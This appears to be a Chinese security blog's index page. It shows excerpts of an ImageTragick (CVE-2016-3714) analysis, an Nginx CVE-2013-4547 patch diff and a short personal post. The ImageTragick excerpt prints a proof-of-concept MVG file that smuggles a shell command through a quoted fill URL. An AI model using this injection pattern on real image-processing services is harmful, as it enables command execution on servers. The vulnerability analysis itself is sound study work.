ls -al

Imagetragick(CVE-2016-3714)执行过程,漏洞分析以及修复方案

post @ 2017-10-10

##什么是ImageMagick

ImageMagick是一个免费的创建、编辑、合成图片的软件。它可以读取、转换、写入多种格式的图片。图片切割、颜色替换、各种效果的应用,图片的旋转、组合,文本,直线,多边形,椭圆,曲线,附加到图片伸展旋转。

##漏洞分析正文

这次披露的是ImageMagick的一个命令执行漏洞。首先定位到最终漏洞代码执行的地方,老外给出的poc是在一个文件内填充以下字符命名为.mvg格式

1
2
3
4
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"ls "-la)'
pop graphic-context
Read More

Nginx-HTTP-Parse 文件解析漏洞

post @ 2017-10-10

补丁分析

CVE-2013-4547是Nginx出现过的一个解析漏洞,

官方的补丁打在了_ngx_httpparse.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
--- src/http/ngx_http_parse.c
+++ src/http/ngx_http_parse.c
@@ -617,6 +617,7 @@ ngx_http_parse_request_line(ngx_http_req
default:
r->space_in_uri = 1;
state = sw_check_uri;
+                p--;
break;
}
break;
@@ -670,6 +671,7 @@ ngx_http_parse_request_line(ngx_http_req
default:
r->space_in_uri = 1;
state = sw_uri;
+                p--;
break;
}
break;
Read More

新博客,新旅程

post @ 2017-10-10

A New Journey

又一段新旅程,新的开始。

人生天地之间,若白驹过隙,忽然而已。

Read More
⬆︎TOP